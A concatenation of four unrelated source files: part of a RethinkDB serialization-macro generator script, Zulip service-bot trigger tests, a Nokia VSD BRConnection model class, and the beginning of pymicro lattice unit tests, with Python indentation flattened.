print " serialize<W>(wm, thing.field%d); \\" % (i + 1)
print " } \\"
print " template <cluster_version_t W> \\"
print " archive_result_t deserialize(%sread_stream_t *s, %stype_t *thing) { \\" % (zeroarg, zeroarg)
print " archive_result_t res = archive_result_t::SUCCESS; \\"
for i in xrange(nfields):
print " res = deserialize<W>(s, deserialize_deref(thing->field%d)); \\" % (i + 1)
print " if (bad(res)) { return res; } \\"
print " return res; \\"
print " } \\"
print " extern int dont_use_RDB_MAKE_SERIALIZABLE_within_a_class_body"
print
print "#define RDB_MAKE_SERIALIZABLE_%d_FOR_CLUSTER(type_t%s) \\" % \
(nfields, fields)
print " template <> \\"
print " void serialize<cluster_version_t::CLUSTER>( \\"
print " %swrite_message_t *wm, %sconst type_t &thing) { \\" % (zeroarg, zeroarg)
for i in xrange(nfields):
print " serialize<cluster_version_t::CLUSTER>(wm, thing.field%d); \\" % (i + 1)
print " } \\"
print " template <> \\"
print " archive_result_t deserialize<cluster_version_t::CLUSTER>( \\"
print " %sread_stream_t *s, %stype_t *thing) { \\" % (zeroarg, zeroarg)
print " archive_result_t res = archive_result_t::SUCCESS; \\"
for i in xrange(nfields):
print " res = deserialize<cluster_version_t::CLUSTER>( \\"
print " s, deserialize_deref(thing->field%d)); \\" % (i + 1)
print " if (bad(res)) { return res; } \\"
print " return res; \\"
print " } \\"
print " extern int dont_use_RDB_MAKE_SERIALIZABLE_FOR_CLUSTER_within_a_class_body"
print
# See the note in the comment below.
print "#define RDB_IMPL_SERIALIZABLE_%d(type_t%s) RDB_MAKE_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields, nfields, fields)
print
print "#define RDB_IMPL_SERIALIZABLE_%d_FOR_CLUSTER(type_t%s) \\" % (nfields, fields)
print " RDB_MAKE_SERIALIZABLE_%d_FOR_CLUSTER(type_t%s);" % (nfields, fields)
print
print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v1_13(type_t%s) \\" % (nfields, fields)
print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
print " INSTANTIATE_SERIALIZABLE_SINCE_v1_13(type_t)"
print
print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v1_16(type_t%s) \\" % (nfields, fields)
print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
print " INSTANTIATE_SERIALIZABLE_SINCE_v1_16(type_t)"
print
print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_1(type_t%s) \\" % (nfields, fields)
print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
print " INSTANTIATE_SERIALIZABLE_SINCE_v2_1(type_t)"
print
print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_2(type_t%s) \\" % (nfields, fields)
print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
print " INSTANTIATE_SERIALIZABLE_SINCE_v2_2(type_t)"
print
print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_3(type_t%s) \\" % (nfields, fields)
print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
print " INSTANTIATE_SERIALIZABLE_SINCE_v2_3(type_t)"
print
print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_4(type_t%s) \\" % (nfields, fields)
print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
print " INSTANTIATE_SERIALIZABLE_SINCE_v2_4(type_t)"
print
print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_5(type_t%s) \\" % (nfields, fields)
print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
print " INSTANTIATE_SERIALIZABLE_SINCE_v2_5(type_t)"
print "#define RDB_MAKE_ME_SERIALIZABLE_%d(type_t%s) \\" % \
(nfields, fields)
print " template <cluster_version_t W> \\"
print " friend void serialize(%swrite_message_t *wm, %sconst type_t &thing) { \\" % (zeroarg, zeroarg)
for i in xrange(nfields):
print " serialize<W>(wm, thing.field%d); \\" % (i + 1)
print " } \\"
print " template <cluster_version_t W> \\"
print " friend archive_result_t deserialize(%sread_stream_t *s, %stype_t *thing) { \\" % (zeroarg, zeroarg)
print " archive_result_t res = archive_result_t::SUCCESS; \\"
for i in xrange(nfields):
print " res = deserialize<W>(s, deserialize_deref(thing->field%d)); \\" % (i + 1)
print " if (bad(res)) { return res; } \\"
print " return res; \\"
print " }"
if __name__ == "__main__":
print "// Copyright 2010-2014 RethinkDB, all rights reserved."
print "#ifndef RPC_SERIALIZE_MACROS_HPP_"
print "#define RPC_SERIALIZE_MACROS_HPP_"
print
print "/* This file is automatically generated by '%s'." % " ".join(sys.argv)
print "Please modify '%s' instead of modifying this file.*/" % sys.argv[0]
print
print "#include <type_traits>"
print
print "#include \"containers/archive/archive.hpp\""
print "#include \"containers/archive/versioned.hpp\""
print "#include \"errors.hpp\""
print "#include \"version.hpp\""
print
print """
/* The purpose of these macros is to make it easier to serialize and
unserialize data types that consist of a simple series of fields, each
of which is serializable. Suppose we have a type "struct point_t {
int32_t x, y; }" that we want to be able to serialize. To make it
serializable automatically, either write
RDB_MAKE_SERIALIZABLE_2(point_t, x, y) at the global scope, or write
RDB_MAKE_ME_SERIALIZABLE_2(point_t, x, y) within the body of the
point_t type.
The _FOR_CLUSTER variants of the macros exist to indicate that a type
can only be serialized for use within the cluster, thus should not be
serialized to disk.
The _SINCE_v1_13 variants of the macros exist to make the conversion to
versioned serialization easier. They must only be used for types which
serialization format has not changed since version 1.13.0.
Once the format changes, you can still use the macros without
the _SINCE_v1_13 suffix and instantiate the serialize() and deserialize()
functions explicitly for a certain version.
We use dummy "extern int" declarations to force a compile error in
macros that should not be used inside of class bodies. */
""".strip()
print "namespace helper {"
print
print "/* When a `static_assert` is used within a templated class or function,"
print " * but does not depend on any template parameters the C++ compiler is free"
print " * to evaluate the assert even before instantiating that template. This"
print " * helper class allows a `static_assert(false, ...)` to depend on the"
print " * `cluster_version_t` template parameter."
print " * Also see http://stackoverflow.com/a/14637534. */"
print "template <cluster_version_t W>"
print "struct always_false"
print " : std::false_type { };"
print
print "} // namespace helper"
print
print "#define RDB_DECLARE_SERIALIZABLE(type_t) \\"
print " template <cluster_version_t W> \\"
print " void serialize(write_message_t *, const type_t &); \\"
print " template <cluster_version_t W> \\"
print " archive_result_t deserialize(read_stream_t *s, type_t *thing); \\"
print " extern int dont_use_RDB_DECLARE_SERIALIZABLE_within_a_class_body"
print
print "#define RDB_DECLARE_SERIALIZABLE_FOR_CLUSTER(type_t) \\"
print " template <cluster_version_t W> \\"
print " void serialize(write_message_t *, const type_t &) { \\"
print " static_assert(helper::always_false<W>::value, \\"
print " \"This type is only serializable for cluster.\"); \\"
print " unreachable(); \\"
print " } \\"
print " template <> \\"
print " void serialize<cluster_version_t::CLUSTER>( \\"
print " write_message_t *, const type_t &); \\"
print " template <cluster_version_t W> \\"
print " archive_result_t deserialize(read_stream_t *, type_t *) { \\"
print " static_assert(helper::always_false<W>::value, \\"
print " \"This type is only deserializable for cluster.\"); \\"
print " unreachable(); \\"
print " } \\"
print " template <> \\"
print " archive_result_t deserialize<cluster_version_t::CLUSTER>( \\"
print " read_stream_t *s, type_t *thing)"
print
print "#define RDB_DECLARE_ME_SERIALIZABLE(type_t) \\"
print " template <cluster_version_t W> \\"
print " friend void serialize(write_message_t *, const type_t &); \\"
print " template <cluster_version_t W> \\"
print " friend archive_result_t deserialize(read_stream_t *s, type_t *thing)"
for nfields in xrange(20):
generate_make_serializable_macro(nfields)
print
print "#endif // RPC_SERIALIZE_MACROS_HPP_"
|
|
# -*- coding: utf-8 -*-
import mock
from typing import Any, Union, Mapping, Callable
from zerver.lib.actions import (
do_create_user,
get_service_bot_events,
)
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import (
get_realm,
UserProfile,
Recipient,
)
BOT_TYPE_TO_QUEUE_NAME = {
UserProfile.OUTGOING_WEBHOOK_BOT: 'outgoing_webhooks',
UserProfile.EMBEDDED_BOT: 'embedded_bots',
}
class TestServiceBotBasics(ZulipTestCase):
def _get_outgoing_bot(self):
# type: () -> UserProfile
outgoing_bot = do_create_user(
email="bar-bot@zulip.com",
password="test",
realm=get_realm("zulip"),
full_name="BarBot",
short_name='bb',
bot_type=UserProfile.OUTGOING_WEBHOOK_BOT,
bot_owner=self.example_user('cordelia'),
)
return outgoing_bot
def test_service_events_for_pms(self):
# type: () -> None
sender = self.example_user('hamlet')
assert(not sender.is_bot)
outgoing_bot = self._get_outgoing_bot()
event_dict = get_service_bot_events(
sender=sender,
service_bot_tuples=[
(outgoing_bot.id, outgoing_bot.bot_type),
],
mentioned_user_ids=set(),
recipient_type=Recipient.PERSONAL,
)
expected = dict(
outgoing_webhooks=[
dict(trigger='private_message', user_profile_id=outgoing_bot.id),
],
)
self.assertEqual(event_dict, expected)
def test_service_events_for_stream_mentions(self):
# type: () -> None
sender = self.example_user('hamlet')
assert(not sender.is_bot)
outgoing_bot = self._get_outgoing_bot()
event_dict = get_service_bot_events(
sender=sender,
service_bot_tuples=[
(outgoing_bot.id, outgoing_bot.bot_type),
],
mentioned_user_ids={outgoing_bot.id},
recipient_type=Recipient.STREAM,
)
expected = dict(
outgoing_webhooks=[
dict(trigger='mention', user_profile_id=outgoing_bot.id),
],
)
self.assertEqual(event_dict, expected)
def test_service_events_for_unsubscribed_stream_mentions(self):
# type: () -> None
sender = self.example_user('hamlet')
assert(not sender.is_bot)
outgoing_bot = self._get_outgoing_bot()
'''
If an outgoing bot is mentioned on a stream message, we will
create an event for it even if it is not subscribed to the
stream and not part of our original `service_bot_tuples`.
Note that we add Cordelia as a red herring value that the
code should ignore, since she is not a bot.
'''
cordelia = self.example_user('cordelia')
event_dict = get_service_bot_events(
sender=sender,
service_bot_tuples=[],
mentioned_user_ids={
outgoing_bot.id,
cordelia.id, # should be excluded, not a service bot
},
recipient_type=Recipient.STREAM,
)
expected = dict(
outgoing_webhooks=[
dict(trigger='mention', user_profile_id=outgoing_bot.id),
],
)
self.assertEqual(event_dict, expected)
class TestServiceBotEventTriggers(ZulipTestCase):
def setUp(self):
# type: () -> None
self.user_profile = self.example_user("othello")
self.bot_profile = do_create_user(email="foo-bot@zulip.com",
password="test",
realm=get_realm("zulip"),
full_name="FooBot",
short_name="foo-bot",
bot_type=UserProfile.OUTGOING_WEBHOOK_BOT,
bot_owner=self.user_profile)
self.second_bot_profile = do_create_user(email="bar-bot@zulip.com",
password="test",
realm=get_realm("zulip"),
full_name="BarBot",
short_name="bar-bot",
bot_type=UserProfile.OUTGOING_WEBHOOK_BOT,
bot_owner=self.user_profile)
# TODO: In future versions this won't be required
self.subscribe(self.bot_profile, 'Denmark')
@mock.patch('zerver.lib.actions.queue_json_publish')
def test_trigger_on_stream_mention_from_user(self, mock_queue_json_publish):
# type: (mock.Mock) -> None
for bot_type, expected_queue_name in BOT_TYPE_TO_QUEUE_NAME.items():
self.bot_profile.bot_type = bot_type
self.bot_profile.save()
content = u'@**FooBot** foo bar!!!'
recipient = 'Denmark'
trigger = 'mention'
message_type = Recipient._type_names[Recipient.STREAM]
def check_values_passed(queue_name, trigger_event, x):
# type: (Any, Union[Mapping[Any, Any], Any], Callable[[Any], None]) -> None
self.assertEqual(queue_name, expected_queue_name)
self.assertEqual(trigger_event["failed_tries"], 0)
self.assertEqual(trigger_event["message"]["content"], content)
self.assertEqual(trigger_event["message"]["display_recipient"], recipient)
self.assertEqual(trigger_event["message"]["sender_email"], self.user_profile.email)
self.assertEqual(trigger_event["message"]["type"], message_type)
self.assertEqual(trigger_event['trigger'], trigger)
self.assertEqual(trigger_event['user_profile_id'], self.bot_profile.id)
mock_queue_json_publish.side_effect = check_values_passed
self.send_message(
self.user_profile.email,
'Denmark',
Recipient.STREAM,
content)
self.assertTrue(mock_queue_json_publish.called)
@mock.patch('zerver.lib.actions.queue_json_publish')
def test_no_trigger_on_stream_message_without_mention(self, mock_queue_json_publish):
# type: (mock.Mock) -> None
sender_email = self.user_profile.email
recipients = "Denmark"
message_type = Recipient.STREAM
self.send_message(sender_email, recipients, message_type)
self.assertFalse(mock_queue_json_publish.called)
@mock.patch('zerver.lib.actions.queue_json_publish')
def test_no_trigger_on_stream_mention_from_bot(self, mock_queue_json_publish):
# type: (mock.Mock) -> None
for bot_type in BOT_TYPE_TO_QUEUE_NAME:
self.bot_profile.bot_type = bot_type
self.bot_profile.save()
self.send_message(
self.second_bot_profile.email,
'Denmark',
Recipient.STREAM,
u'@**FooBot** foo bar!!!')
self.assertFalse(mock_queue_json_publish.called)
@mock.patch('zerver.lib.actions.queue_json_publish')
def test_trigger_on_personal_message_from_user(self, mock_queue_json_publish):
# type: (mock.Mock) -> None
for bot_type, expected_queue_name in BOT_TYPE_TO_QUEUE_NAME.items():
self.bot_profile.bot_type = bot_type
self.bot_profile.save()
sender_email = self.user_profile.email
recipient_email = self.bot_profile.email
message_type = Recipient.PERSONAL
def check_values_passed(queue_name, trigger_event, x):
# type: (Any, Union[Mapping[Any, Any], Any], Callable[[Any], None]) -> None
self.assertEqual(queue_name, expected_queue_name)
self.assertEqual(trigger_event["user_profile_id"], self.bot_profile.id)
self.assertEqual(trigger_event["trigger"], "private_message")
self.assertEqual(trigger_event["failed_tries"], 0)
self.assertEqual(trigger_event["message"]["sender_email"], sender_email)
display_recipients = [
trigger_event["message"]["display_recipient"][0]["email"],
trigger_event["message"]["display_recipient"][1]["email"],
]
self.assertTrue(sender_email in display_recipients)
self.assertTrue(recipient_email in display_recipients)
mock_queue_json_publish.side_effect = check_values_passed
self.send_message(sender_email, recipient_email, message_type, subject='', content='test')
self.assertTrue(mock_queue_json_publish.called)
@mock.patch('zerver.lib.actions.queue_json_publish')
def test_no_trigger_on_personal_message_from_bot(self, mock_queue_json_publish):
# type: (mock.Mock) -> None
for bot_type in BOT_TYPE_TO_QUEUE_NAME:
self.bot_profile.bot_type = bot_type
self.bot_profile.save()
sender_email = self.second_bot_profile.email
recipient_email = self.bot_profile.email
message_type = Recipient.PERSONAL
self.send_message(sender_email, recipient_email, message_type)
self.assertFalse(mock_queue_json_publish.called)
@mock.patch('zerver.lib.actions.queue_json_publish')
def test_trigger_on_huddle_message_from_user(self, mock_queue_json_publish):
# type: (mock.Mock) -> None
for bot_type, expected_queue_name in BOT_TYPE_TO_QUEUE_NAME.items():
self.bot_profile.bot_type = bot_type
self.bot_profile.save()
self.second_bot_profile.bot_type = bot_type
self.second_bot_profile.save()
sender_email = self.user_profile.email
recipient_emails = [self.bot_profile.email, self.second_bot_profile.email]
message_type = Recipient.HUDDLE
profile_ids = [self.bot_profile.id, self.second_bot_profile.id]
def check_values_passed(queue_name, trigger_event, x):
# type: (Any, Union[Mapping[Any, Any], Any], Callable[[Any], None]) -> None
self.assertEqual(queue_name, expected_queue_name)
self.assertIn(trigger_event["user_profile_id"], profile_ids)
profile_ids.remove(trigger_event["user_profile_id"])
self.assertEqual(trigger_event["trigger"], "private_message")
self.assertEqual(trigger_event["failed_tries"], 0)
self.assertEqual(trigger_event["message"]["sender_email"], sender_email)
self.assertEqual(trigger_event["message"]["type"], u'private')
mock_queue_json_publish.side_effect = check_values_passed
self.send_message(sender_email, recipient_emails, message_type, subject='', content='test')
self.assertEqual(mock_queue_json_publish.call_count, 2)
mock_queue_json_publish.reset_mock()
@mock.patch('zerver.lib.actions.queue_json_publish')
def test_no_trigger_on_huddle_message_from_bot(self, mock_queue_json_publish):
# type: (mock.Mock) -> None
for bot_type in BOT_TYPE_TO_QUEUE_NAME:
self.bot_profile.bot_type = bot_type
self.bot_profile.save()
sender_email = self.second_bot_profile.email
recipient_emails = [self.user_profile.email, self.bot_profile.email]
message_type = Recipient.HUDDLE
self.send_message(sender_email, recipient_emails, message_type)
self.assertFalse(mock_queue_json_publish.called)
|
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUBFDSessionsFetcher
from .fetchers import NUGlobalMetadatasFetcher
from bambou import NURESTObject
class NUBRConnection(NURESTObject):
""" Represents a BRConnection in the VSD
Notes:
Configuration of VNS Gateway Border Router connection
"""
__rest_name__ = "brconnection"
__resource_name__ = "brconnections"
## Constants
CONST_ADVERTISEMENT_CRITERIA_OPERATIONAL_LINK = "OPERATIONAL_LINK"
CONST_ADVERTISEMENT_CRITERIA_BFD = "BFD"
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
CONST_MODE_STATIC = "Static"
CONST_ADDRESS_FAMILY_IPV6 = "IPV6"
CONST_ADDRESS_FAMILY_IPV4 = "IPV4"
def __init__(self, **kwargs):
""" Initializes a BRConnection instance
Notes:
You can specify all parameters while calling this methods.
A special argument named `data` will enable you to load the
object from a Python dictionary
Examples:
>>> brconnection = NUBRConnection(id=u'xxxx-xxx-xxx-xxx', name=u'BRConnection')
>>> brconnection = NUBRConnection(data=my_dict)
"""
super(NUBRConnection, self).__init__()
# Read/Write Attributes
self._dns_address = None
self._dns_address_v6 = None
self._last_updated_by = None
self._last_updated_date = None
self._gateway = None
self._gateway_v6 = None
self._address = None
self._address_family = None
self._address_v6 = None
self._advertisement_criteria = None
self._netmask = None
self._embedded_metadata = None
self._inherited = None
self._entity_scope = None
self._mode = None
self._uplink_id = None
self._creation_date = None
self._owner = None
self._external_id = None
self.expose_attribute(local_name="dns_address", remote_name="DNSAddress", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="dns_address_v6", remote_name="DNSAddressV6", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="gateway", remote_name="gateway", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="gateway_v6", remote_name="gatewayV6", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="address", remote_name="address", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="address_family", remote_name="addressFamily", attribute_type=str, is_required=False, is_unique=False, choices=[u'IPV4', u'IPV6'])
self.expose_attribute(local_name="address_v6", remote_name="addressV6", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="advertisement_criteria", remote_name="advertisementCriteria", attribute_type=str, is_required=False, is_unique=False, choices=[u'BFD', u'OPERATIONAL_LINK'])
self.expose_attribute(local_name="netmask", remote_name="netmask", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="inherited", remote_name="inherited", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="mode", remote_name="mode", attribute_type=str, is_required=False, is_unique=False, choices=[u'Static'])
self.expose_attribute(local_name="uplink_id", remote_name="uplinkID", attribute_type=int, is_required=False, is_unique=False)
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
# Fetchers
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.bfd_sessions = NUBFDSessionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
# Properties
@property
def dns_address(self):
""" Get dns_address value.
Notes:
DNS Address for the vlan
This attribute is named `DNSAddress` in VSD API.
"""
return self._dns_address
@dns_address.setter
def dns_address(self, value):
""" Set dns_address value.
Notes:
DNS Address for the vlan
This attribute is named `DNSAddress` in VSD API.
"""
self._dns_address = value
@property
def dns_address_v6(self):
""" Get dns_address_v6 value.
Notes:
DNS IPv6 Address
This attribute is named `DNSAddressV6` in VSD API.
"""
return self._dns_address_v6
@dns_address_v6.setter
def dns_address_v6(self, value):
""" Set dns_address_v6 value.
Notes:
DNS IPv6 Address
This attribute is named `DNSAddressV6` in VSD API.
"""
self._dns_address_v6 = value
@property
def last_updated_by(self):
""" Get last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
""" Set last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
self._last_updated_by = value
@property
def last_updated_date(self):
""" Get last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
""" Set last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
self._last_updated_date = value
@property
def gateway(self):
""" Get gateway value.
Notes:
IP address of the gateway bound to the VLAN.
"""
return self._gateway
@gateway.setter
def gateway(self, value):
""" Set gateway value.
Notes:
IP address of the gateway bound to the VLAN.
"""
self._gateway = value
@property
def gateway_v6(self):
""" Get gateway_v6 value.
Notes:
IPv6 address of the gateway bound to the port.
This attribute is named `gatewayV6` in VSD API.
"""
return self._gateway_v6
@gateway_v6.setter
def gateway_v6(self, value):
""" Set gateway_v6 value.
Notes:
IPv6 address of the gateway bound to the port.
This attribute is named `gatewayV6` in VSD API.
"""
self._gateway_v6 = value
@property
def address(self):
""" Get address value.
Notes:
Static IP address for the VLAN on which the BR Connection is created.
"""
return self._address
@address.setter
def address(self, value):
""" Set address value.
Notes:
Static IP address for the VLAN on which the BR Connection is created.
"""
self._address = value
@property
def address_family(self):
""" Get address_family value.
Notes:
IP address family of this BRConnection
This attribute is named `addressFamily` in VSD API.
"""
return self._address_family
@address_family.setter
def address_family(self, value):
""" Set address_family value.
Notes:
IP address family of this BRConnection
This attribute is named `addressFamily` in VSD API.
"""
self._address_family = value
@property
def address_v6(self):
""" Get address_v6 value.
Notes:
IPv6 address for static configuration on the BR Connection instance.
This attribute is named `addressV6` in VSD API.
"""
return self._address_v6
@address_v6.setter
def address_v6(self, value):
""" Set address_v6 value.
Notes:
IPv6 address for static configuration on the BR Connection instance.
This attribute is named `addressV6` in VSD API.
"""
self._address_v6 = value
@property
def advertisement_criteria(self):
""" Get advertisement_criteria value.
Notes:
Advertisement Criteria for Traffic Flow on a BR Connection.
This attribute is named `advertisementCriteria` in VSD API.
"""
return self._advertisement_criteria
@advertisement_criteria.setter
def advertisement_criteria(self, value):
""" Set advertisement_criteria value.
Notes:
Advertisement Criteria for Traffic Flow on a BR Connection.
This attribute is named `advertisementCriteria` in VSD API.
"""
self._advertisement_criteria = value
@property
def netmask(self):
""" Get netmask value.
Notes:
network mask
"""
return self._netmask
@netmask.setter
def netmask(self, value):
""" Set netmask value.
Notes:
network mask
"""
self._netmask = value
@property
def embedded_metadata(self):
""" Get embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
""" Set embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
self._embedded_metadata = value
@property
def inherited(self):
""" Get inherited value.
Notes:
This flag will determine if the abstract connection is inherited from the instance template
"""
return self._inherited
@inherited.setter
def inherited(self, value):
""" Set inherited value.
Notes:
This flag will determine if the abstract connection is inherited from the instance template
"""
self._inherited = value
@property
def entity_scope(self):
""" Get entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
""" Set entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
self._entity_scope = value
@property
def mode(self):
""" Get mode value.
Notes:
Connection mode: Only static is allowed on a Bridge Router Connection.
"""
return self._mode
@mode.setter
def mode(self, value):
""" Set mode value.
Notes:
Connection mode: Only static is allowed on a Bridge Router Connection.
"""
self._mode = value
@property
def uplink_id(self):
""" Get uplink_id value.
Notes:
Internally generated ID in the range that idenitifies the uplink within the context of NSG.
This attribute is named `uplinkID` in VSD API.
"""
return self._uplink_id
@uplink_id.setter
def uplink_id(self, value):
""" Set uplink_id value.
Notes:
Internally generated ID in the range that idenitifies the uplink within the context of NSG.
This attribute is named `uplinkID` in VSD API.
"""
self._uplink_id = value
@property
def creation_date(self):
""" Get creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
return self._creation_date
@creation_date.setter
def creation_date(self, value):
""" Set creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
self._creation_date = value
@property
def owner(self):
""" Get owner value.
Notes:
Identifies the user that has created this object.
"""
return self._owner
@owner.setter
def owner(self, value):
""" Set owner value.
Notes:
Identifies the user that has created this object.
"""
self._owner = value
@property
def external_id(self):
""" Get external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
return self._external_id
@external_id.setter
def external_id(self, value):
""" Set external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
self._external_id = value
|
|
import unittest
import numpy as np
from math import pi, cos, sin, acos, atan
from pymicro.crystal.lattice import Lattice, CrystallinePhase, Symmetry, HklObject, HklDirection, HklPlane, SlipSystem
class LatticeTests(unittest.TestCase):
def setUp(self):
print('testing the Lattice class')
def test_equality(self):
l1 = Lattice.cubic(0.5)
a = np.array([[0.5, 0., 0.],
[0., 0.5, 0.],
[0., 0., 0.5]])
l2 = Lattice(a, symmetry=Symmetry.cubic)
self.assertEqual(l1, l2)
def test_cubic(self):
a = np.array([[0.5, 0., 0.],
[0., 0.5, 0.],
[0., 0., 0.5]])
l = Lattice.cubic(0.5)
for i in range(0, 3):
for j in range(0, 3):
self.assertEqual(l.matrix[i][j], a[i][j])
def test_volume(self):
l = Lattice.cubic(0.5)
self.assertAlmostEqual(l.volume(), 0.125)
def test_from_symbol(self):
al = Lattice.from_symbol('Al')
for i in range(0, 3):
self.assertAlmostEqual(al._lengths[i], 0.40495, 4)
self.assertEqual(al._angles[i], 90.0)
def test_reciprocal_lattice(self):
Mg2Si = Lattice.from_parameters(1.534, 0.405, 0.683, 90., 106., 90., x_aligned_with_a=False)
[astar, bstar, cstar] = Mg2Si.reciprocal_lattice()
self.assertAlmostEqual(astar[0], 0.678, 3)
self.assertAlmostEqual(astar[1], 0., 3)
self.assertAlmostEqual(astar[2], 0., 3)
self.assertAlmostEqual(bstar[0], 0., 3)
self.assertAlmostEqual(bstar[1], 2.469, 3)
self.assertAlmostEqual(bstar[2], 0., 3)
self.assertAlmostEqual(cstar[0], 0.420, 3)
self.assertAlmostEqual(cstar[1], 0., 3)
self.assertAlmostEqual(cstar[2], 1.464, 3)
class CrystallinePhaseTests(unittest.TestCase):
def setUp(self):
print('testing the CrystallinePhase class')
def test_init(self):
phase = CrystallinePhase(name='test')
self.assertEqual(phase.phase_id, 1)
self.assertEqual(phase.name, 'test')
class HklDirectionTests(unittest.TestCase):
def setUp(self):
print('testing the HklDirection class')
def test_angle_between_directions(self):
d111 = HklDirection(1, 1, 1)
d110 = HklDirection(1, 1, 0)
d100 = HklDirection(1, 0, 0)
dm111 = HklDirection(-1, 1, 1)
self.assertAlmostEqual(d100.angle_with_direction(d110) * 180 / np.pi, 45.0)
